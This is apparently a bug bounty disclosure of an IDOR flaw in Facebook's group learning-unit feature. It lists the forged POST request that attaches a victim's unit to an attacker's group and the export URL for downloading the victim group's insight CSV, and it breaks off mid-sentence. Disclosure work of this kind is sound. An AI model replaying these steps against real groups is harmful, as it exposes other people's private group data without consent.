Disclose the Facebook Learning Unit Group Insight
There is an IDOR issue in a feature called learning unit which lead to disclose the Group Insight. If the targeted group privacy is public, then attacker can disclose the group insight without become a member and for closed/secret group privacy, attacker need to become a member. Steps : 1. Request POST /groups/learning/edit_units_dialog/submit/ ..... group_id=Attacker_Group&description=&unit_ids[0]=Victim_Unit_ID Response : for (;;);{"__ar":1,"payload":null,"jsmods":{"require":[["ServerRedirect","reloadPage",[],[]]]},... Victim unit should appear in attacker group. 2. Attacker go to his group > group insight and request a download to download the group insight data (.csv format) and wait until notification from facebook that his data is ready to be download. 3. From the browser, open a new tab and go to https://www.facebook.com/groups/Attacker_group_ID/completions_export/ 4. The .csv file includi